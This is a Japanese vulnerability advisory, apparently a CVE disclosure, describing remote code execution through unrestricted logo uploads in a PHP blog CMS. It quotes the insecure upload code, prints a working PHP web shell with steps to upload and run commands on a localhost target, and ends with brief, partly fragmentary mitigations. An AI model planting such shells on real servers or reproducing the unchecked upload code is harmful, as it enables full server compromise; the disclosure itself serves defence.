
CVE-2025-15495 - 任意のファイルアップロードによるリモートコード実行(RCE)
BiggiDroid – Simple PHP Blog CMS 製品ページ: https://biggidroid.com/product/simple-php-blog/
致命的
CVSS(推定): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Simple PHP Blog CMS には、管理パネルの サイトロゴアップロード機能 に 制限なしファイルアップロードの脆弱性 があります。 認証された攻撃者は、画像に偽装した 悪意のあるPHPファイル をアップロードできます。このファイルは Webからアクセス可能なディレクトリ に保存され、サーバーによって実行され、リモートコマンド実行 を引き起こします。
管理パネル → サイトロゴの更新
関連する脆弱なコードスニペット:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
shell.php という名前のファイルを作成:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php をアップロード📌 アプリケーションは 検証なしでPHPファイルを受け入れます
アップロード後、ファイルは次の場所でアクセス可能:
http://127.0.0.1/image/shell.php
システムコマンドの実行:
http://127.0.0.1/image/shell.php?cmd=dir
サーバーはOSコマンドを実行し、出力を返します。これにより リモートコード実行 が確認されます。





攻撃者は以下が可能:
この脆弱性は サーバーの完全な乗っ取り につながる可能性があります。
.htaccess / サーバー強化なしファイル拡張子を制限
$allowed = ['jpg','jpeg','png','gif'];
MIMEタイプを検証
finfo_file()
アップロードされたファイルの名前を変更